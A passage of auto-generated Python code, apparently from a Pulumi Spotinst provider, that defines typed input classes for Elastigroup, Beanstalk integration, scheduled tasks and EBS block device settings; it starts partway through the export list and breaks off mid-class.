'ElastigroupIntegrationKubernetesArgs',
'ElastigroupIntegrationKubernetesAutoscaleDownArgs',
'ElastigroupIntegrationKubernetesAutoscaleHeadroomArgs',
'ElastigroupIntegrationKubernetesAutoscaleLabelArgs',
'ElastigroupIntegrationMesosphereArgs',
'ElastigroupIntegrationMultaiRuntimeArgs',
'ElastigroupIntegrationNomadArgs',
'ElastigroupIntegrationNomadAutoscaleConstraintArgs',
'ElastigroupIntegrationNomadAutoscaleDownArgs',
'ElastigroupIntegrationNomadAutoscaleHeadroomArgs',
'ElastigroupIntegrationRancherArgs',
'ElastigroupIntegrationRoute53Args',
'ElastigroupIntegrationRoute53DomainArgs',
'ElastigroupIntegrationRoute53DomainRecordSetArgs',
'ElastigroupItfArgs',
'ElastigroupItfLoadBalancerArgs',
'ElastigroupItfLoadBalancerListenerRuleArgs',
'ElastigroupItfTargetGroupConfigArgs',
'ElastigroupItfTargetGroupConfigMatcherArgs',
'ElastigroupItfTargetGroupConfigTagArgs',
'ElastigroupMetadataOptionsArgs',
'ElastigroupMultaiTargetSetArgs',
'ElastigroupMultipleMetricsArgs',
'ElastigroupMultipleMetricsExpressionArgs',
'ElastigroupMultipleMetricsMetricArgs',
'ElastigroupMultipleMetricsMetricDimensionArgs',
'ElastigroupNetworkInterfaceArgs',
'ElastigroupResourceTagSpecificationArgs',
'ElastigroupRevertToSpotArgs',
'ElastigroupScalingDownPolicyArgs',
'ElastigroupScalingDownPolicyDimensionArgs',
'ElastigroupScalingDownPolicyStepAdjustmentArgs',
'ElastigroupScalingDownPolicyStepAdjustmentActionArgs',
'ElastigroupScalingStrategyArgs',
'ElastigroupScalingTargetPolicyArgs',
'ElastigroupScalingTargetPolicyDimensionArgs',
'ElastigroupScalingUpPolicyArgs',
'ElastigroupScalingUpPolicyDimensionArgs',
'ElastigroupScalingUpPolicyStepAdjustmentArgs',
'ElastigroupScalingUpPolicyStepAdjustmentActionArgs',
'ElastigroupScheduledTaskArgs',
'ElastigroupSignalArgs',
'ElastigroupStatefulDeallocationArgs',
'ElastigroupStatefulInstanceActionArgs',
'ElastigroupTagArgs',
'ElastigroupUpdatePolicyArgs',
'ElastigroupUpdatePolicyRollConfigArgs',
'ElastigroupUpdatePolicyRollConfigStrategyArgs',
'ElastigroupUpdatePolicyRollConfigStrategyOnFailureArgs',
'ManagedInstanceBlockDeviceMappingArgs',
'ManagedInstanceBlockDeviceMappingEbsArgs',
'ManagedInstanceIntegrationRoute53Args',
'ManagedInstanceIntegrationRoute53DomainArgs',
'ManagedInstanceIntegrationRoute53DomainRecordSetArgs',
'ManagedInstanceLoadBalancerArgs',
'ManagedInstanceManagedInstanceActionArgs',
'ManagedInstanceNetworkInterfaceArgs',
'ManagedInstanceResourceTagSpecificationArgs',
'ManagedInstanceRevertToSpotArgs',
'ManagedInstanceScheduledTaskArgs',
'ManagedInstanceTagArgs',
'MrScalarApplicationArgs',
'MrScalarBootstrapActionsFileArgs',
'MrScalarConfigurationsFileArgs',
'MrScalarCoreEbsBlockDeviceArgs',
'MrScalarCoreScalingDownPolicyArgs',
'MrScalarCoreScalingUpPolicyArgs',
'MrScalarInstanceWeightArgs',
'MrScalarMasterEbsBlockDeviceArgs',
'MrScalarProvisioningTimeoutArgs',
'MrScalarScheduledTaskArgs',
'MrScalarStepsFileArgs',
'MrScalarTagArgs',
'MrScalarTaskEbsBlockDeviceArgs',
'MrScalarTaskScalingDownPolicyArgs',
'MrScalarTaskScalingUpPolicyArgs',
'MrScalarTerminationPolicyArgs',
'MrScalarTerminationPolicyStatementArgs',
'OceanAutoscalerArgs',
'OceanAutoscalerAutoscaleDownArgs',
'OceanAutoscalerAutoscaleHeadroomArgs',
'OceanAutoscalerResourceLimitsArgs',
'OceanInstanceMetadataOptionsArgs',
'OceanLaunchSpecAutoscaleHeadroomArgs',
'OceanLaunchSpecBlockDeviceMappingArgs',
'OceanLaunchSpecBlockDeviceMappingEbsArgs',
'OceanLaunchSpecBlockDeviceMappingEbsDynamicVolumeSizeArgs',
'OceanLaunchSpecCreateOptionsArgs',
'OceanLaunchSpecDeleteOptionsArgs',
'OceanLaunchSpecElasticIpPoolArgs',
'OceanLaunchSpecElasticIpPoolTagSelectorArgs',
'OceanLaunchSpecLabelArgs',
'OceanLaunchSpecResourceLimitArgs',
'OceanLaunchSpecSchedulingTaskArgs',
'OceanLaunchSpecSchedulingTaskTaskHeadroomArgs',
'OceanLaunchSpecStrategyArgs',
'OceanLaunchSpecTagArgs',
'OceanLaunchSpecTaintArgs',
'OceanLaunchSpecUpdatePolicyArgs',
'OceanLaunchSpecUpdatePolicyRollConfigArgs',
'OceanLoadBalancerArgs',
'OceanLoggingArgs',
'OceanLoggingExportArgs',
'OceanLoggingExportS3Args',
'OceanScheduledTaskArgs',
'OceanScheduledTaskShutdownHoursArgs',
'OceanScheduledTaskTaskArgs',
'OceanTagArgs',
'OceanUpdatePolicyArgs',
'OceanUpdatePolicyRollConfigArgs',
'SuspensionSuspensionArgs',
]
@pulumi.input_type
class BeanstalkDeploymentPreferencesArgs:
def __init__(__self__, *,
automatic_roll: Optional[pulumi.Input[bool]] = None,
batch_size_percentage: Optional[pulumi.Input[int]] = None,
grace_period: Optional[pulumi.Input[int]] = None,
strategies: Optional[pulumi.Input[Sequence[pulumi.Input['BeanstalkDeploymentPreferencesStrategyArgs']]]] = None):
"""
:param pulumi.Input[bool] automatic_roll: Should roll perform automatically
:param pulumi.Input[int] batch_size_percentage: Percent size of each batch
:param pulumi.Input[int] grace_period: Amount of time to wait between batches
:param pulumi.Input[Sequence[pulumi.Input['BeanstalkDeploymentPreferencesStrategyArgs']]] strategies: Strategy parameters
"""
if automatic_roll is not None:
pulumi.set(__self__, "automatic_roll", automatic_roll)
if batch_size_percentage is not None:
pulumi.set(__self__, "batch_size_percentage", batch_size_percentage)
if grace_period is not None:
pulumi.set(__self__, "grace_period", grace_period)
if strategies is not None:
pulumi.set(__self__, "strategies", strategies)
@property
@pulumi.getter(name="automaticRoll")
def automatic_roll(self) -> Optional[pulumi.Input[bool]]:
"""
Should roll perform automatically
"""
return pulumi.get(self, "automatic_roll")
@automatic_roll.setter
def automatic_roll(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "automatic_roll", value)
@property
@pulumi.getter(name="batchSizePercentage")
def batch_size_percentage(self) -> Optional[pulumi.Input[int]]:
"""
Percent size of each batch
"""
return pulumi.get(self, "batch_size_percentage")
@batch_size_percentage.setter
def batch_size_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "batch_size_percentage", value)
@property
@pulumi.getter(name="gracePeriod")
def grace_period(self) -> Optional[pulumi.Input[int]]:
"""
Amount of time to wait between batches
"""
return pulumi.get(self, "grace_period")
@grace_period.setter
def grace_period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "grace_period", value)
@property
@pulumi.getter
def strategies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['BeanstalkDeploymentPreferencesStrategyArgs']]]]:
"""
Strategy parameters
"""
return pulumi.get(self, "strategies")
@strategies.setter
def strategies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['BeanstalkDeploymentPreferencesStrategyArgs']]]]):
pulumi.set(self, "strategies", value)
@pulumi.input_type
class BeanstalkDeploymentPreferencesStrategyArgs:
def __init__(__self__, *,
action: Optional[pulumi.Input[str]] = None,
should_drain_instances: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] action: Action to take
:param pulumi.Input[bool] should_drain_instances: Bool value if to wait to drain instance
"""
if action is not None:
pulumi.set(__self__, "action", action)
if should_drain_instances is not None:
pulumi.set(__self__, "should_drain_instances", should_drain_instances)
@property
@pulumi.getter
def action(self) -> Optional[pulumi.Input[str]]:
"""
Action to take
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "action", value)
@property
@pulumi.getter(name="shouldDrainInstances")
def should_drain_instances(self) -> Optional[pulumi.Input[bool]]:
"""
Bool value if to wait to drain instance
"""
return pulumi.get(self, "should_drain_instances")
@should_drain_instances.setter
def should_drain_instances(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_drain_instances", value)
@pulumi.input_type
class BeanstalkManagedActionsArgs:
def __init__(__self__, *,
platform_update: Optional[pulumi.Input['BeanstalkManagedActionsPlatformUpdateArgs']] = None):
"""
:param pulumi.Input['BeanstalkManagedActionsPlatformUpdateArgs'] platform_update: Platform Update parameters
"""
if platform_update is not None:
pulumi.set(__self__, "platform_update", platform_update)
@property
@pulumi.getter(name="platformUpdate")
def platform_update(self) -> Optional[pulumi.Input['BeanstalkManagedActionsPlatformUpdateArgs']]:
"""
Platform Update parameters
"""
return pulumi.get(self, "platform_update")
@platform_update.setter
def platform_update(self, value: Optional[pulumi.Input['BeanstalkManagedActionsPlatformUpdateArgs']]):
pulumi.set(self, "platform_update", value)
@pulumi.input_type
class BeanstalkManagedActionsPlatformUpdateArgs:
def __init__(__self__, *,
perform_at: Optional[pulumi.Input[str]] = None,
time_window: Optional[pulumi.Input[str]] = None,
update_level: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] perform_at: Actions to perform (options: timeWindow, never)
:param pulumi.Input[str] time_window: Time Window for when action occurs ex. Mon:23:50-Tue:00:20
:param pulumi.Input[str] update_level: - Level to update
"""
if perform_at is not None:
pulumi.set(__self__, "perform_at", perform_at)
if time_window is not None:
pulumi.set(__self__, "time_window", time_window)
if update_level is not None:
pulumi.set(__self__, "update_level", update_level)
@property
@pulumi.getter(name="performAt")
def perform_at(self) -> Optional[pulumi.Input[str]]:
"""
Actions to perform (options: timeWindow, never)
"""
return pulumi.get(self, "perform_at")
@perform_at.setter
def perform_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "perform_at", value)
@property
@pulumi.getter(name="timeWindow")
def time_window(self) -> Optional[pulumi.Input[str]]:
"""
Time Window for when action occurs ex. Mon:23:50-Tue:00:20
"""
return pulumi.get(self, "time_window")
@time_window.setter
def time_window(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_window", value)
@property
@pulumi.getter(name="updateLevel")
def update_level(self) -> Optional[pulumi.Input[str]]:
"""
- Level to update
"""
return pulumi.get(self, "update_level")
@update_level.setter
def update_level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "update_level", value)
@pulumi.input_type
class BeanstalkScheduledTaskArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
adjustment: Optional[pulumi.Input[str]] = None,
adjustment_percentage: Optional[pulumi.Input[str]] = None,
batch_size_percentage: Optional[pulumi.Input[str]] = None,
cron_expression: Optional[pulumi.Input[str]] = None,
frequency: Optional[pulumi.Input[str]] = None,
grace_period: Optional[pulumi.Input[str]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None,
max_capacity: Optional[pulumi.Input[str]] = None,
min_capacity: Optional[pulumi.Input[str]] = None,
scale_max_capacity: Optional[pulumi.Input[str]] = None,
scale_min_capacity: Optional[pulumi.Input[str]] = None,
scale_target_capacity: Optional[pulumi.Input[str]] = None,
start_time: Optional[pulumi.Input[str]] = None,
target_capacity: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] task_type: The task type to run. Supported task types are: `"scale"`, `"backup_ami"`, `"roll"`, `"scaleUp"`, `"percentageScaleUp"`, `"scaleDown"`, `"percentageScaleDown"`, `"statefulUpdateCapacity"`.
:param pulumi.Input[str] adjustment: The number of instances to add or remove.
:param pulumi.Input[str] adjustment_percentage: The percentage of instances to add or remove.
:param pulumi.Input[str] batch_size_percentage: The percentage size of each batch in the scheduled deployment roll.
:param pulumi.Input[str] cron_expression: A valid cron expression. The cron is running in UTC time zone and is in [Unix cron format](https://en.wikipedia.org/wiki/Cron).
:param pulumi.Input[str] frequency: The recurrence frequency to run this task. Supported values are `"hourly"`, `"daily"`, `"weekly"` and `"continuous"`.
:param pulumi.Input[str] grace_period: The period of time (seconds) to wait before checking a batch's health after it's deployment.
:param pulumi.Input[bool] is_enabled: Setting the task to being enabled or disabled.
:param pulumi.Input[str] max_capacity: The maximum number of instances the group should have.
:param pulumi.Input[str] min_capacity: The minimum number of instances the group should have.
:param pulumi.Input[str] scale_max_capacity: The maximum number of instances the group should have.
:param pulumi.Input[str] scale_min_capacity: The minimum number of instances the group should have.
:param pulumi.Input[str] scale_target_capacity: The desired number of instances the group should have.
:param pulumi.Input[str] start_time: Set a start time for one time tasks.
:param pulumi.Input[str] target_capacity: The desired number of instances the group should have.
"""
pulumi.set(__self__, "task_type", task_type)
if adjustment is not None:
pulumi.set(__self__, "adjustment", adjustment)
if adjustment_percentage is not None:
pulumi.set(__self__, "adjustment_percentage", adjustment_percentage)
if batch_size_percentage is not None:
pulumi.set(__self__, "batch_size_percentage", batch_size_percentage)
if cron_expression is not None:
pulumi.set(__self__, "cron_expression", cron_expression)
if frequency is not None:
pulumi.set(__self__, "frequency", frequency)
if grace_period is not None:
pulumi.set(__self__, "grace_period", grace_period)
if is_enabled is not None:
pulumi.set(__self__, "is_enabled", is_enabled)
if max_capacity is not None:
pulumi.set(__self__, "max_capacity", max_capacity)
if min_capacity is not None:
pulumi.set(__self__, "min_capacity", min_capacity)
if scale_max_capacity is not None:
pulumi.set(__self__, "scale_max_capacity", scale_max_capacity)
if scale_min_capacity is not None:
pulumi.set(__self__, "scale_min_capacity", scale_min_capacity)
if scale_target_capacity is not None:
pulumi.set(__self__, "scale_target_capacity", scale_target_capacity)
if start_time is not None:
pulumi.set(__self__, "start_time", start_time)
if target_capacity is not None:
pulumi.set(__self__, "target_capacity", target_capacity)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
The task type to run. Supported task types are: `"scale"`, `"backup_ami"`, `"roll"`, `"scaleUp"`, `"percentageScaleUp"`, `"scaleDown"`, `"percentageScaleDown"`, `"statefulUpdateCapacity"`.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def adjustment(self) -> Optional[pulumi.Input[str]]:
"""
The number of instances to add or remove.
"""
return pulumi.get(self, "adjustment")
@adjustment.setter
def adjustment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adjustment", value)
@property
@pulumi.getter(name="adjustmentPercentage")
def adjustment_percentage(self) -> Optional[pulumi.Input[str]]:
"""
The percentage of instances to add or remove.
"""
return pulumi.get(self, "adjustment_percentage")
@adjustment_percentage.setter
def adjustment_percentage(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adjustment_percentage", value)
@property
@pulumi.getter(name="batchSizePercentage")
def batch_size_percentage(self) -> Optional[pulumi.Input[str]]:
"""
The percentage size of each batch in the scheduled deployment roll.
"""
return pulumi.get(self, "batch_size_percentage")
@batch_size_percentage.setter
def batch_size_percentage(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "batch_size_percentage", value)
@property
@pulumi.getter(name="cronExpression")
def cron_expression(self) -> Optional[pulumi.Input[str]]:
"""
A valid cron expression. The cron is running in UTC time zone and is in [Unix cron format](https://en.wikipedia.org/wiki/Cron).
"""
return pulumi.get(self, "cron_expression")
@cron_expression.setter
def cron_expression(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cron_expression", value)
@property
@pulumi.getter
def frequency(self) -> Optional[pulumi.Input[str]]:
"""
The recurrence frequency to run this task. Supported values are `"hourly"`, `"daily"`, `"weekly"` and `"continuous"`.
"""
return pulumi.get(self, "frequency")
@frequency.setter
def frequency(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "frequency", value)
@property
@pulumi.getter(name="gracePeriod")
def grace_period(self) -> Optional[pulumi.Input[str]]:
"""
The period of time (seconds) to wait before checking a batch's health after it's deployment.
"""
return pulumi.get(self, "grace_period")
@grace_period.setter
def grace_period(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "grace_period", value)
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Setting the task to being enabled or disabled.
"""
return pulumi.get(self, "is_enabled")
@is_enabled.setter
def is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_enabled", value)
@property
@pulumi.getter(name="maxCapacity")
def max_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The maximum number of instances the group should have.
"""
return pulumi.get(self, "max_capacity")
@max_capacity.setter
def max_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_capacity", value)
@property
@pulumi.getter(name="minCapacity")
def min_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The minimum number of instances the group should have.
"""
return pulumi.get(self, "min_capacity")
@min_capacity.setter
def min_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_capacity", value)
@property
@pulumi.getter(name="scaleMaxCapacity")
def scale_max_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The maximum number of instances the group should have.
"""
return pulumi.get(self, "scale_max_capacity")
@scale_max_capacity.setter
def scale_max_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scale_max_capacity", value)
@property
@pulumi.getter(name="scaleMinCapacity")
def scale_min_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The minimum number of instances the group should have.
"""
return pulumi.get(self, "scale_min_capacity")
@scale_min_capacity.setter
def scale_min_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scale_min_capacity", value)
@property
@pulumi.getter(name="scaleTargetCapacity")
def scale_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The desired number of instances the group should have.
"""
return pulumi.get(self, "scale_target_capacity")
@scale_target_capacity.setter
def scale_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scale_target_capacity", value)
@property
@pulumi.getter(name="startTime")
def start_time(self) -> Optional[pulumi.Input[str]]:
"""
Set a start time for one time tasks.
"""
return pulumi.get(self, "start_time")
@start_time.setter
def start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "start_time", value)
@property
@pulumi.getter(name="targetCapacity")
def target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The desired number of instances the group should have.
"""
return pulumi.get(self, "target_capacity")
@target_capacity.setter
def target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_capacity", value)
@pulumi.input_type
class ElastigroupCpuOptionsArgs:
def __init__(__self__, *,
threads_per_core: pulumi.Input[int]):
"""
:param pulumi.Input[int] threads_per_core: The ability to define the number of threads per core in instances that allow this.
"""
pulumi.set(__self__, "threads_per_core", threads_per_core)
@property
@pulumi.getter(name="threadsPerCore")
def threads_per_core(self) -> pulumi.Input[int]:
"""
The ability to define the number of threads per core in instances that allow this.
"""
return pulumi.get(self, "threads_per_core")
@threads_per_core.setter
def threads_per_core(self, value: pulumi.Input[int]):
pulumi.set(self, "threads_per_core", value)
@pulumi.input_type
class ElastigroupEbsBlockDeviceArgs:
def __init__(__self__, *,
device_name: pulumi.Input[str],
delete_on_termination: Optional[pulumi.Input[bool]] = None,
encrypted: Optional[pulumi.Input[bool]] = None,
iops: Optional[pulumi.Input[int]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
snapshot_id: Optional[pulumi.Input[str]] = None,
throughput: Optional[pulumi.Input[int]] = None,
volume_size: Optional[pulumi.Input[int]] = None,
volume_type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] device_name: The name of the device to mount.
:param pulumi.Input[bool] delete_on_termination: Whether the volume should be destroyed on instance termination.
:param pulumi.Input[bool] encrypted: Enables [EBS encryption](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html) on the volume.
:param pulumi.Input[int] iops: The amount of provisioned [IOPS](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-io-characteristics.html). This must be set with a `volume_type` of `"io1"`.
:param pulumi.Input[str] kms_key_id: ID for a user managed CMK under which the EBS Volume is encrypted
:param pulumi.Input[str] snapshot_id: The Snapshot ID to mount.
:param pulumi.Input[int] throughput: The amount of data transferred to or from a storage device per second, you can use this param just in a case that `volume_type` = gp3.
:param pulumi.Input[int] volume_size: The size of the volume in gigabytes.
:param pulumi.Input[str] volume_type: The type of volume. Can be `"standard"`, `"gp2"`, `"io1"`, `"st1"` or `"sc1"`.
"""
pulumi.set(__self__, "device_name", device_name)
if delete_on_termination is not None:
pulumi.set(__self__, "delete_on_termination", delete_on_termination)
if encrypted is not None:
pulumi.set(__self__, "encrypted", encrypted)
if iops is not None:
pulumi.set(__self__, "iops", iops)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if snapshot_id is not None:
pulumi.set(__self__, "snapshot_id", snapshot_id)
if throughput is not None:
pulumi.set(__self__, "throughput", throughput)
if volume_size is not None:
pulumi.set(__self__, "volume_size", volume_size)
if volume_type is not None:
pulumi.set(__self__, "volume_type", volume_type)
@property
@pulumi.getter(name="deviceName")
def device_name(self) -> pulumi.Input[str]:
"""
The name of the device to mount.
"""
return pulumi.get(self, "device_name")
@device_name.setter
def device_name(self, value: pulumi.Input[str]):
pulumi.set(self, "device_name", value)
@property
@pulumi.getter(name="deleteOnTermination")
def delete_on_termination(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the volume should be destroyed on instance termination.
"""
return pulumi.get(self, "delete_on_termination")
@delete_on_termination.setter
def delete_on_termination(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "delete_on_termination", value)
@property
@pulumi.getter
def encrypted(self) -> Optional[pulumi.Input[bool]]:
"""
Enables [EBS encryption](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html) on the volume.
"""
return pulumi.get(self, "encrypted")
@encrypted.setter
def encrypted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "encrypted", value)
@property
@pulumi.getter
def iops(self) -> Optional[pulumi.Input[int]]:
"""
The amount of provisioned [IOPS](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-io-characteristics.html). This must be set with a `volume_type` of `"io1"`.
"""
return pulumi.get(self, "iops")
@iops.setter
def iops(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "iops", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
"""
ID for a user managed CMK under which the EBS Volume is encrypted
"""
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter(name="snapshotId")
def snapshot_id(self) -> Optional[pulumi.Input[str]]:
"""
The Snapshot ID to mount.
"""
return pulumi.get(self, "snapshot_id")
@snapshot_id.setter
def snapshot_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "snapshot_id", value)
@property
@pulumi.getter
def throughput(self) -> Optional[pulumi.Input[int]]:
"""
The amount of data transferred to or from a storage device per second, you can use this param just in a case that `volume_type` = gp3.
"""
return pulumi.get(self, "throughput")
@throughput.setter
def throughput(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "throughput", value)
@property
@pulumi.getter(name="volumeSize")
def volume_size(self) -> Optional[pulumi.Input[int]]:
"""
The size of the volume in gigabytes.
"""
return pulumi.get(self, "volume_size")
@volume_size.setter
def volume_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "volume_size", value)
@property
@pulumi.getter(name="volumeType")
def volume_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of volume. Can be `"standard"`, `"gp2"`, `"io1"`, `"st1"` or `"sc1"`.
"""
return pulumi.get(self, "volume_type")
@volume_type.setter
def volume_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "volume_type", value)
@pulumi.input_type
class ElastigroupEphemeralBlockDeviceArgs:
def __init__(__self__, *,
device_name: pulumi.Input[str],
virtual_name: pulumi.Input[str]):
"""
:param pulumi.Input[str] device_name: The name of the block device to mount on the instance.
:param pulumi.Input[str] virtual_name: The [Instance Store Device Name](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.html#InstanceStoreDeviceNames)
(e.g. `"ephemeral0"`).
"""
pulumi.set(__self__, "device_name", device_name)
pulumi.set(__self__, "virtual_name", virtual_name)
@property
@pulumi.getter(name="deviceName")
def device_name(self) -> pulumi.Input[str]:
"""
The name of the block device to mount on the instance.
"""
return pulumi.get(self, "device_name")
@device_name.setter
def device_name(self, value: pulumi.Input[str]):
pulumi.set(self, "device_name", value)
@property
@pulumi.getter(name="virtualName")
def virtual_name(self) -> pulumi.Input[str]:
"""
The [Instance Store Device Name](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.html#InstanceStoreDeviceNames)
(e.g. `"ephemeral0"`).
"""
return pulumi.get(self, "virtual_name")
@virtual_name.setter
def virtual_name(self, value: pulumi.Input[str]):
pulumi.set(self, "virtual_name", value)
@pulumi.input_type
class ElastigroupInstanceTypesWeightArgs:
def __init__(__self__, *,
instance_type: pulumi.Input[str],
weight: pulumi.Input[int]):
"""
:param pulumi.Input[str] instance_type: Name of instance type (String).
:param pulumi.Input[int] weight: Weight per instance type (Integer).
"""
pulumi.set(__self__, "instance_type", instance_type)
pulumi.set(__self__, "weight", weight)
@property
@pulumi.getter(name="instanceType")
def instance_type(self) -> pulumi.Input[str]:
"""
Name of instance type (String).
"""
return pulumi.get(self, "instance_type")
@instance_type.setter
def instance_type(self, value: pulumi.Input[str]):
pulumi.set(self, "instance_type", value)
@property
@pulumi.getter
def weight(self) -> pulumi.Input[int]:
"""
Weight per instance type (Integer).
"""
return pulumi.get(self, "weight")
@weight.setter
def weight(self, value: pulumi.Input[int]):
pulumi.set(self, "weight", value)
@pulumi.input_type
class ElastigroupIntegrationBeanstalkArgs:
def __init__(__self__, *,
deployment_preferences: Optional[pulumi.Input['ElastigroupIntegrationBeanstalkDeploymentPreferencesArgs']] = None,
environment_id: Optional[pulumi.Input[str]] = None,
managed_actions: Optional[pulumi.Input['ElastigroupIntegrationBeanstalkManagedActionsArgs']] = None):
"""
:param pulumi.Input['ElastigroupIntegrationBeanstalkDeploymentPreferencesArgs'] deployment_preferences: Preferences when performing a roll
:param pulumi.Input['ElastigroupIntegrationBeanstalkManagedActionsArgs'] managed_actions: Managed Actions parameters
"""
if deployment_preferences is not None:
pulumi.set(__self__, "deployment_preferences", deployment_preferences)
if environment_id is not None:
pulumi.set(__self__, "environment_id", environment_id)
if managed_actions is not None:
pulumi.set(__self__, "managed_actions", managed_actions)
@property
@pulumi.getter(name="deploymentPreferences")
def deployment_preferences(self) -> Optional[pulumi.Input['ElastigroupIntegrationBeanstalkDeploymentPreferencesArgs']]:
"""
Preferences when performing a roll
"""
return pulumi.get(self, "deployment_preferences")
@deployment_preferences.setter
def deployment_preferences(self, value: Optional[pulumi.Input['ElastigroupIntegrationBeanstalkDeploymentPreferencesArgs']]):
pulumi.set(self, "deployment_preferences", value)
@property
@pulumi.getter(name="environmentId")
def environment_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "environment_id")
@environment_id.setter
def environment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "environment_id", value)
@property
@pulumi.getter(name="managedActions")
def managed_actions(self) -> Optional[pulumi.Input['ElastigroupIntegrationBeanstalkManagedActionsArgs']]:
"""
Managed Actions parameters
"""
return pulumi.get(self, "managed_actions")
@managed_actions.setter
def managed_actions(self, value: Optional[pulumi.Input['ElastigroupIntegrationBeanstalkManagedActionsArgs']]):
pulumi.set(self, "managed_actions", value)
@pulumi.input_type
class ElastigroupIntegrationBeanstalkDeploymentPreferencesArgs:
def __init__(__self__, *,
automatic_roll: Optional[pulumi.Input[bool]] = None,
batch_size_percentage: Optional[pulumi.Input[int]] = None,
grace_period: Optional[pulumi.Input[int]] = None,
strategy: Optional[pulumi.Input['ElastigroupIntegrationBeanstalkDeploymentPreferencesStrategyArgs']] = None):
"""
:param pulumi.Input[bool] automatic_roll: Should roll perform automatically
:param pulumi.Input[int] batch_size_percentage: Sets the percentage of the instances to deploy in each batch.
:param pulumi.Input[int] grace_period: Sets the grace period for new instances to become healthy.
:param pulumi.Input['ElastigroupIntegrationBeanstalkDeploymentPreferencesStrategyArgs'] strategy: Strategy parameters
"""
if automatic_roll is not None:
pulumi.set(__self__, "automatic_roll", automatic_roll)
if batch_size_percentage is not None:
pulumi.set(__self__, "batch_size_percentage", batch_size_percentage)
if grace_period is not None:
pulumi.set(__self__, "grace_period", grace_period)
if strategy is not None:
pulumi.set(__self__, "strategy", strategy)
@property
@pulumi.getter(name="automaticRoll")
def automatic_roll(self) -> Optional[pulumi.Input[bool]]:
"""
Should roll perform automatically
"""
return pulumi.get(self, "automatic_roll")
@automatic_roll.setter
def automatic_roll(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "automatic_roll", value)
@property
@pulumi.getter(name="batchSizePercentage")
def batch_size_percentage(self) -> Optional[pulumi.Input[int]]:
"""
Sets the percentage of the instances to deploy in each batch.
"""
return pulumi.get(self, "batch_size_percentage")
@batch_size_percentage.setter
def batch_size_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "batch_size_percentage", value)
@property
@pulumi.getter(name="gracePeriod")
def grace_period(self) -> Optional[pulumi.Input[int]]:
"""
Sets the grace period for new instances to become healthy.
"""
return pulumi.get(self, "grace_period")
@grace_period.setter
def grace_period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "grace_period", value)
@property
@pulumi.getter
def strategy(self) -> Optional[pulumi.Input['ElastigroupIntegrationBeanstalkDeploymentPreferencesStrategyArgs']]:
"""
Strategy parameters
"""
return pulumi.get(self, "strategy")
@strategy.setter
